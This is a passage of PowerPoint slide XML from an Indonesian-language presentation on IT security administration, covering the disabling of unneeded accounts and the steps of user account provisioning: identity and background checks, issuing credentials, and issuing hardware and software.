            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23901426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Penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menuntut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendidikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
